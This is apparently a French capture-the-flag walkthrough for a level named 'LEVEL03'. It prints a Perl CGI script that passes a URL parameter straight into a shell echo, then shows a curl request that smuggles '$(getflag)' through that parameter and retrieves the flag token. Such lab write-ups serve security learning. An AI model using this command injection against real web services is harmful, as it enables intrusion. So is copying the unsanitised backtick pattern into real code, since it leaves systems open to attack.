-----------------------------------------------------------
                          LEVEL03
-----------------------------------------------------------

1. On affiche le contenu du fichier perl level04.pl
   --------------------------------------------------------
   CM : strings level04.pl
   OUTPUT : #!/usr/bin/perl
            # localhost:4747
            use CGI qw{param};
            print "Content-type: text/html\n\n";
            sub x {
            $y = $_[0];
            print `echo $y 2>&1`;
            x(param("x"));

2. Le script perl permet d'afficher la valeur de premier
   paramètre envoyé 
   --------------------------------------------------------
   CM : curl 'localhost:4747?x=coucou'
   OUTPUT : coucou

3. De fait, on peut envoyé un subshell pour que le echo du
   script affiche son contenu
   --------------------------------------------------------
   CM : curl 'localhost:4747?x=$(getflag)
   OUTPUT : Check flag.
            Here is your token : ne2searoevaevoem4ov4ar8ap

